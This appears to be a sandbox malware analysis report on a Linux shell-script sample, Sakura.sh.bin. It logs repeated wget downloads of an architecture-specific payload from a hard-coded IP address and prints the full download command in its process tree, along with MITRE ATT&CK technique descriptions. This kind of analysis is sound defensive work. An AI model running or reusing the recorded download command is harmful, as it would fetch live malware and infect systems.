Mar 18, 2025 13:37:50.185069084 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.20	55112	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:37:54.012506962 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.20	55114	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:37:58.694766998 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.20	55116	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:04.322434902 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.20	55118	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:10.984224081 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.20	55120	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:18.666766882 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.20	55122	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:27.376090050 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.20	55124	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:37.012166977 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.20	55126	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:47.690439939 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.20	55128	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:38:59.406023026 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.20	55130	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:39:11.461536884 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.20	55132	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:39:23.255594969 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.20	55134	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:39:34.903887987 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.20	55136	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:39:46.557913065 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.20	55138	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:39:58.227543116 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

System Behavior

Analysis Process: bash PID: 4717, Parent PID: 4620

General

Start time (UTC):	12:37:46
Start date (UTC):	18/03/2025
Path:	/bin/bash
Arguments:	/bin/bash /tmp/Sakura.sh.bin
File size:	1037528 bytes
MD5 hash:	5e666695cf08d1638bb85684e30185ee

File Activities

File Opened

File Read

Process Activities

Process Forked

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: bash PID: 4722, Parent PID: 4717

General

Start time (UTC):	12:37:46
Start date (UTC):	18/03/2025
Path:	/bin/bash
Arguments:	-
File size:	1037528 bytes
MD5 hash:	5e666695cf08d1638bb85684e30185ee

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: wget PID: 4722, Parent PID: 4717

General

Start time (UTC):	12:37:46
Start date (UTC):	18/03/2025
Path:	/usr/bin/wget
Arguments:	wget http://45.135.194.28/m-i.p-s.Sakura
File size:	474656 bytes
MD5 hash:	acaead6d3c5bcc35a12ab496fa834365

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report Sakura.sh.bin

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: bash PID: 4717, Parent PID: 4620

General

File Activities

File Opened

File Read

Process Activities

Process Forked

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: bash PID: 4722, Parent PID: 4717

General

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: wget PID: 4722, Parent PID: 4717

General

File Activities

File Opened

File Read

Chronological Activities

Linux Analysis Report
Sakura.sh.bin